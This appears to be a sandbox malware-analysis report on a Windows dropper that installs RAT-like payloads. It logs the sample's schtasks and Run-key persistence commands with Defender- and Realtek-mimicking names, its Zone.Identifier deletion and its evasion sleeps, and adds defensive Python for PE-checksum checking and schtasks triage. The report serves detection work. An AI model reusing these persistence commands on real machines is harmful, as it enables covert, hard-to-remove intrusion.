Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks' /create /tn 'win defender run' /sc ONLOGON /tr 'C:\Users\user\AppData\Roaming\SubDir\winsock.exe' /rl HIGHEST /f
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe'
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe'
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Process created: C:\Users\user\AppData\Local\Temp\vnc.exe 'C:\Users\user\AppData\Local\Temp\vnc.exe'
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe'
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Process created: C:\Users\user\btpanui\SystemPropertiesPerformance.exe C:\Users\user\btpanui\SystemPropertiesPerformance.exe
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Process created: C:\Users\user\AppData\Local\Temp\vnc.exe 'C:\Users\user\AppData\Local\Temp\vnc.exe' Jump to behavior
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe' Jump to behavior
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Process created: C:\Users\user\Desktop\CVbJSUXraQ.exe C:\Users\user\Desktop\CVbJSUXraQ.exe Jump to behavior
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks' /create /tn 'win defender run' /sc ONLOGON /tr 'C:\Users\user\AppData\Local\Temp\windef.exe' /rl HIGHEST /f Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe Process created: C:\Users\user\AppData\Roaming\SubDir\winsock.exe C:\Users\user\AppData\Roaming\SubDir\winsock.exe Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Process created: C:\Users\user\AppData\Local\Temp\vnc.exe 'C:\Users\user\AppData\Local\Temp\vnc.exe' Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Process created: C:\Users\user\AppData\Local\Temp\windef.exe 'C:\Users\user\AppData\Local\Temp\windef.exe' Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Process created: C:\Users\user\btpanui\SystemPropertiesPerformance.exe C:\Users\user\btpanui\SystemPropertiesPerformance.exe Jump to behavior
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F Jump to behavior
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe File created: C:\Users\user\AppData\Local\Temp\vnc.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 1_2_00E13C55 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification, 1_2_00E13C55
Source: winsock.exe.6.dr, ??uf70a????ue511ue157??uec43ue3d6???u2a79??uf0d6.cs Base64 encoded string: 'oIIRNa+RdIwW+qaBULzt1DUcxpjlz0HNdN7K1cLb4jQThGkGX88S8hX6tdF7p9CzQ/6QHXnWqrx4b/nIZ3FJXA==', 'QbMzDPpqqUXstevFR58fKA0Jr+e3jVtCkhoKVPhySmaFNMTJp1ppj/Kt0w5lWPuTqkKvCiwMGvqLQtAHqp/17s/0tIGcigHxTkcio6g+yX4aTA0D6g6rgIBwSbettKev', 'iwb/FVEFSrvXyRpBxbtrAvdMlxa7+ov04yp0i3czHSu4tv1s4GZ3EJzmAGkSQNOaN8kB3o9RFUbfJZJcB+hSpA==', 'lhs5124+CoNVKqRqKICGyr7DRe4uuuc1FLOEmOGHA7APoV7jgwYZxWM4M5pEtojmeyNbOwwMXfB8DTqa3KrHaQ==', 'plRSbnRAYEQD5L8YxtmTiGxc90fTxUBQapXZHFYTfMfDL8U0L0qqFBNRQNSpPeLR3w4wTg+tkb/s4reeumXm1A=='
Source: 6.0.windef.exe.f10000.0.unpack, ??uf70a????ue511ue157??uec43ue3d6???u2a79??uf0d6.cs Base64 encoded string: 'oIIRNa+RdIwW+qaBULzt1DUcxpjlz0HNdN7K1cLb4jQThGkGX88S8hX6tdF7p9CzQ/6QHXnWqrx4b/nIZ3FJXA==', 'QbMzDPpqqUXstevFR58fKA0Jr+e3jVtCkhoKVPhySmaFNMTJp1ppj/Kt0w5lWPuTqkKvCiwMGvqLQtAHqp/17s/0tIGcigHxTkcio6g+yX4aTA0D6g6rgIBwSbettKev', 'iwb/FVEFSrvXyRpBxbtrAvdMlxa7+ov04yp0i3czHSu4tv1s4GZ3EJzmAGkSQNOaN8kB3o9RFUbfJZJcB+hSpA==', 'lhs5124+CoNVKqRqKICGyr7DRe4uuuc1FLOEmOGHA7APoV7jgwYZxWM4M5pEtojmeyNbOwwMXfB8DTqa3KrHaQ==', 'plRSbnRAYEQD5L8YxtmTiGxc90fTxUBQapXZHFYTfMfDL8U0L0qqFBNRQNSpPeLR3w4wTg+tkb/s4reeumXm1A=='
Source: 6.2.windef.exe.f10000.0.unpack, ??uf70a????ue511ue157??uec43ue3d6???u2a79??uf0d6.cs Base64 encoded string: 'oIIRNa+RdIwW+qaBULzt1DUcxpjlz0HNdN7K1cLb4jQThGkGX88S8hX6tdF7p9CzQ/6QHXnWqrx4b/nIZ3FJXA==', 'QbMzDPpqqUXstevFR58fKA0Jr+e3jVtCkhoKVPhySmaFNMTJp1ppj/Kt0w5lWPuTqkKvCiwMGvqLQtAHqp/17s/0tIGcigHxTkcio6g+yX4aTA0D6g6rgIBwSbettKev', 'iwb/FVEFSrvXyRpBxbtrAvdMlxa7+ov04yp0i3czHSu4tv1s4GZ3EJzmAGkSQNOaN8kB3o9RFUbfJZJcB+hSpA==', 'lhs5124+CoNVKqRqKICGyr7DRe4uuuc1FLOEmOGHA7APoV7jgwYZxWM4M5pEtojmeyNbOwwMXfB8DTqa3KrHaQ==', 'plRSbnRAYEQD5L8YxtmTiGxc90fTxUBQapXZHFYTfMfDL8U0L0qqFBNRQNSpPeLR3w4wTg+tkb/s4reeumXm1A=='
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Mutant created: \Sessions\1\BaseNamedObjects\runas
Source: C:\Windows\System32\svchost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\{41435A30-AC43-1BEB-BE05-A07FD209D423}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6084:120:WilError_01
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Mutant created: \Sessions\1\BaseNamedObjects\AE86A6D5-F9414907-A8AD8678-FDF622E2-FED71C3E8
Source: C:\Users\user\AppData\Local\Temp\windef.exe Mutant created: \Sessions\1\BaseNamedObjects\QSR_MUTEX_0kBRNrRz5TDLEQouI0
Source: C:\Users\user\AppData\Local\Temp\windef.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: CVbJSUXraQ.exe Static file information: File size 2111264 > 1048576
Source: CVbJSUXraQ.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x13a800
Source: CVbJSUXraQ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: CVbJSUXraQ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: CVbJSUXraQ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: CVbJSUXraQ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: CVbJSUXraQ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: CVbJSUXraQ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: CVbJSUXraQ.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: ntdll.pdb source: vnc.exe, 00000004.00000003.715734553.0000000003530000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: vnc.exe, 00000004.00000003.715734553.0000000003530000.00000004.00000001.sdmp
Source: CVbJSUXraQ.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: CVbJSUXraQ.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: CVbJSUXraQ.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: CVbJSUXraQ.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: CVbJSUXraQ.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 1_2_00DD8945 push ecx; ret 1_2_00DD8958
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Code function: 4_2_00AB103B push ecx; ret 4_2_00AB104B
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Code function: 4_2_00ABE0BC push ecx; ret 4_2_00ABE0CC
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Code function: 4_2_00ADEAA9 push cs; iretd 4_2_00ADEAB8
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Code function: 4_2_00ADEA73 push cs; ret 4_2_00ADEA88
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Code function: 4_2_00ADE3DD push es; iretd 4_2_00ADE3EC
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00CA2D0C push ecx; ret 5_2_00CA2D1C
Source: C:\Users\user\AppData\Local\Temp\windef.exe Code function: 6_2_00F125B2 push esi; ret 6_2_00F125CF
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_00DD8945 push ecx; ret 7_2_00DD8958
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_00DC4257 push edi; ret 7_2_00DC4259
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_00DC426B push edi; ret 7_2_00DC426D
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_0041A068 push 0041A08Eh; ret 7_2_0041A086
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_0041A02C push 0041A05Ch; ret 7_2_0041A054
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_0040E8D0 push 0040E905h; ret 7_2_0040E8FD
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_0040B164 push 0040B190h; ret 7_2_0040B188
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_0040E908 push 0040E94Ah; ret 7_2_0040E942
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_0040B12C push 0040B158h; ret 7_2_0040B150
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_0040C136 push 0040C164h; ret 7_2_0040C15C
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_0040C138 push 0040C164h; ret 7_2_0040C15C
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_0040813C push 00408174h; ret 7_2_0040816C
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_004171E8 push 00417214h; ret 7_2_0041720C
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_0040C9EA push 0040CA18h; ret 7_2_0040CA10
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_0040C9EC push 0040CA18h; ret 7_2_0040CA10
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_0040E1A4 push 0040E1D0h; ret 7_2_0040E1C8
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_0040B1B8 push 0040B1E4h; ret 7_2_0040B1DC
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_0040E25A push 0040E288h; ret 7_2_0040E280
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_0040E25C push 0040E288h; ret 7_2_0040E280
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_00414A28 push 00414A84h; ret 7_2_00414A7C
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_0040BAB8 push 0040BAE4h; ret 7_2_0040BADC
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_00409B54 push 00409BC8h; ret 7_2_00409BC0
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_00409B78 push 00409BC8h; ret 7_2_00409BC0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 1_2_00DB4B37 LoadLibraryA,GetProcAddress, 1_2_00DB4B37
PE file contains an invalid checksum
Source: windef.exe.1.dr Static PE information: real checksum: 0x0 should be: 0x60aad
Source: SystemPropertiesPerformance.exe.1.dr Static PE information: real checksum: 0x110ada should be: 0x208fb2
Source: winsock.exe.6.dr Static PE information: real checksum: 0x0 should be: 0x60aad
Source: vnc.exe.10.dr Static PE information: real checksum: 0x0 should be: 0x657b3
Source: CVbJSUXraQ.exe Static PE information: real checksum: 0x110ada should be: 0x209217
Source: vnc.exe.1.dr Static PE information: real checksum: 0x0 should be: 0x657b3
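The "real checksum ... should be" lines compare the CheckSum field stored in each PE's optional header with the value the Windows CheckSumMappedFile algorithm yields for the file. A stored value of 0x0 (windef.exe, winsock.exe, vnc.exe) means the linker or packer never wrote one; it is weak evidence on its own, since many unsigned tools ship that way. A stored value that is non-zero but wrong (CVbJSUXraQ.exe: 0x110ada versus 0x209217) means the file was changed after the checksum was written, which is consistent with the two PE payloads found appended in its RT_RCDATA resources. The Python below reproduces the comparison so a dropped file can be checked outside the sandbox. It is an added example, not Joe Sandbox code; build_minimal_pe_header and its 160-byte header stub are constructed here only so the code runs offline, and the fold follows the same steps pefile's generate_checksum uses.

```python
"""Recompute a PE optional-header CheckSum and compare it with the stored value.

Added example for this report (not Joe Sandbox code). The algorithm is the one
behind imagehlp!CheckSumMappedFile: sum every DWORD of the file except the
CheckSum field itself with end-around carry, fold to 16 bits, add the file size.
"""
import struct
import sys


def checksum_field_offset(data):
    """File offset of IMAGE_OPTIONAL_HEADER.CheckSum, or None if not a PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 0x5C > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    # PE signature (4) + IMAGE_FILE_HEADER (20) + 0x40 into the optional header;
    # the CheckSum field sits at the same place for PE32 and PE32+.
    return e_lfanew + 0x58


def compute_pe_checksum(data, skip_offset):
    """Sum all DWORDs except the one at skip_offset, fold to 16 bits, add the length."""
    total = 0
    padded = bytes(data) + b"\0" * (-len(data) % 4)   # trailing bytes count as a zero-padded DWORD
    for off in range(0, len(padded), 4):
        if off == skip_offset:                          # CheckSum field is DWORD-aligned in a valid PE
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        total = (total & 0xFFFFFFFF) + (total >> 32)    # end-around carry at 32 bits
    total = (total & 0xFFFF) + (total >> 16)            # fold to 16 bits ...
    total += total >> 16                                # ... and absorb the last carry
    total &= 0xFFFF
    return total + len(data)                            # original (unpadded) file size


def verify_pe_checksum(data):
    """Return (stored, computed); a stored value of 0 means the linker never set it."""
    off = checksum_field_offset(data)
    if off is None:
        raise ValueError("not a PE image")
    stored = struct.unpack_from("<I", data, off)[0]
    return stored, compute_pe_checksum(data, off)


def build_minimal_pe_header(stored_checksum):
    """Constructed 160-byte stub (MZ, e_lfanew, PE signature, PE32 magic, CheckSum) for offline testing."""
    buf = bytearray(0xA0)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)                 # e_lfanew -> PE signature at 0x40
    buf[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<H", buf, 0x40 + 0x18, 0x10B)         # IMAGE_OPTIONAL_HEADER.Magic = PE32
    struct.pack_into("<I", buf, 0x40 + 0x58, stored_checksum)
    return bytes(buf)


if __name__ == "__main__":
    # Usage: python pe_checksum.py <file>, e.g. a copy of the dropped windef.exe
    target = sys.argv[1] if len(sys.argv) > 1 else None
    blob = open(target, "rb").read() if target else build_minimal_pe_header(0)
    stored, computed = verify_pe_checksum(blob)
    verdict = "unset" if stored == 0 else ("ok" if stored == computed else "MISMATCH")
    print("real checksum: %#x should be: %#x (%s)" % (stored, computed, verdict))
```

Because the field is excluded from the sum, the stub header always computes to the same value regardless of what is stored in it; that is what lets the three outcomes (unset, matching, modified after link) be told apart from a single pass over the file.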

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe File created: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Jump to dropped file
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe File created: C:\Users\user\AppData\Local\Temp\vnc.exe
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe File created: C:\Users\user\AppData\Local\Temp\windef.exe
Source: C:\Users\user\AppData\Local\Temp\windef.exe File created: C:\Users\user\AppData\Roaming\SubDir\winsock.exe Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F
Source: C:\Users\user\AppData\Local\Temp\windef.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run win defender run Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\windef.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run win defender run Jump to behavior
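The two task definitions are the sample's boot survival: RtkAudioService64 relaunches SystemPropertiesPerformance.exe from the user profile every minute (/sc minute /mo 1 /F, a relaunch watchdog dressed as a Realtek service), and 'win defender run' starts windef.exe (later winsock.exe) at logon with /rl HIGHEST, backed by a Run key of the same name. The Python below is an added triage routine for schtasks /create command lines taken from process-creation telemetry, not Joe Sandbox code. The first two sample lines are this report's own (the sandbox renders the quotes as single quotes, real Windows logs use double quotes; both are handled), the third is a constructed benign control, and the name-mimicry pattern and the "every five minutes or less" threshold are heuristic choices of the author.

```python
"""Triage schtasks /create command lines for malware-style persistence.

Added example for this report (not Joe Sandbox code). Parsing is done in
shlex non-POSIX mode so Windows backslashes stay literal and both quote styles
group arguments correctly.
"""
import re
import shlex

SAMPLE_CMDLINES = [
    # From this report's 'Process created' entries:
    "'C:\\Windows\\SysWOW64\\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\\Users\\user\\btpanui\\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F",
    "'schtasks' /create /tn 'win defender run' /sc ONLOGON /tr 'C:\\Users\\user\\AppData\\Local\\Temp\\windef.exe' /rl HIGHEST /f",
    # Constructed benign control line:
    'schtasks.exe /create /tn "Acme Backup" /tr "C:\\Program Files\\Acme\\backup.exe" /sc daily /st 02:00',
]

USER_WRITABLE = re.compile(r"(?i)^[a-z]:\\users\\[^\\]+\\")                 # anything under a user profile
TRUSTED_ROOT = re.compile(r"(?i)^[a-z]:\\(windows|program files( \(x86\))?)\\")
MIMIC_NAME = re.compile(r"(?i)(service|defender|update|microsoft|windows|security)")  # heuristic


def _unquote(tok):
    if len(tok) >= 2 and tok[0] == tok[-1] and tok[0] in "'\"":
        return tok[1:-1]
    return tok


def parse_schtasks(cmdline):
    """Return {'/option': value-or-True} with option names lower-cased."""
    toks = [_unquote(t) for t in shlex.split(cmdline, posix=False)]
    opts = {}
    i = 1                                   # toks[0] is the schtasks image itself
    while i < len(toks):
        tok = toks[i]
        if tok.startswith("/"):
            nxt = toks[i + 1] if i + 1 < len(toks) else None
            if nxt is not None and not nxt.startswith("/"):
                opts[tok.lower()] = nxt     # option with a value
                i += 2
                continue
            opts[tok.lower()] = True        # bare switch such as /F
        i += 1
    return opts


def triage_schtasks(cmdline):
    """Return the list of reasons this task creation looks like persistence abuse."""
    opts = parse_schtasks(cmdline)
    if "/create" not in opts:
        return []
    action = opts.get("/tr") if isinstance(opts.get("/tr"), str) else ""
    name = opts.get("/tn") if isinstance(opts.get("/tn"), str) else ""
    sched = str(opts.get("/sc", "")).lower()
    reasons = []
    if sched == "minute":
        try:
            every = int(opts.get("/mo", 1))
        except (TypeError, ValueError):
            every = 1
        if every <= 5:                      # threshold is a heuristic choice
            reasons.append("high-frequency trigger: every %d minute(s) (relaunch watchdog pattern)" % every)
    if str(opts.get("/rl", "")).lower() == "highest":
        reasons.append("/rl HIGHEST: task runs with the creator's highest available token")
    if USER_WRITABLE.match(action):
        reasons.append("action binary lives under a user profile (user-writable): " + action)
    if MIMIC_NAME.search(name) and action and not TRUSTED_ROOT.match(action):
        reasons.append("task name '%s' suggests a system component but the action is outside Windows/Program Files" % name)
    return reasons


if __name__ == "__main__":
    for cmd in SAMPLE_CMDLINES:
        hits = triage_schtasks(cmd)
        print("%d finding(s): %s" % (len(hits), cmd))
        for h in hits:
            print("   -", h)
```

Each report line trips three rules while the control line trips none; in practice the user-writable action path is the strongest single signal, because legitimate scheduled tasks almost never execute from %TEMP% or %APPDATA%, and the same rule catches the Run key value above, which points at the same binaries.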

Hooking and other Techniques for Hiding and Protection:

Icon mismatch, binary includes an icon from a different legit application in order to fool users
Source: initial sample Icon embedded in binary file: icon matches a legit application icon: download (31).png
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic from local ephemeral port 49743 to remote port 8000
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\AppData\Local\Temp\windef.exe File opened: C:\Users\user\AppData\Local\Temp\windef.exe:Zone.Identifier read attributes | delete
Source: C:\Users\user\AppData\Local\Temp\windef.exe File opened: C:\Users\user\AppData\Roaming\SubDir\winsock.exe:Zone.Identifier read attributes | delete
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 1_2_00DB48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 1_2_00DB48D7
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C83CC0 IsIconic,GetLastActivePopup,OpenClipboard,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,CloseClipboard, 5_2_00C83CC0
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C8143C IsIconic,GetLastActivePopup, 5_2_00C8143C
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C821C8 IsIconic, 5_2_00C821C8
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C7CDE8 IsIconic,memset,GetWindow,GetWindow, 5_2_00C7CDE8
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C7B764 GetWindowLongPtrA,IsIconic, 5_2_00C7B764
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_00DB48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 7_2_00DB48D7
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Code function: 10_2_00A448D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 10_2_00A448D7
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_00DD3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 7_2_00DD3187
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Process information set: NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Users\user\AppData\Local\Temp\windef.exe Process information set: NOOPENFILEERRORBOX (43 occurrences)
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Process information set: NOOPENFILEERRORBOX (2 occurrences)

Malware Analysis System Evasion:

May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\windef.exe TID: 4128 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\windef.exe TID: 5872 Thread sleep time: -922337203685477s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains long sleeps (>= 3 min); note that 922337203685477 corresponds to the largest representable relative delay (INT64_MAX), i.e. an indefinite wait on that thread rather than a timed evasion sleep
Source: C:\Users\user\AppData\Local\Temp\windef.exe Thread delayed: delay time: 922337203685477 (2 occurrences)
Source: SystemPropertiesPerformance.exe, 0000000A.00000002.941562165.00000000017DC000.00000004.00000001.sdmp Binary or memory string: vmtoolsd.exe
Source: svchost.exe, 00000005.00000000.720666690.0000020DCBE1F000.00000004.00000001.sdmp, windef.exe, 00000006.00000002.720199755.0000000005849000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Process information queried: ProcessInformation
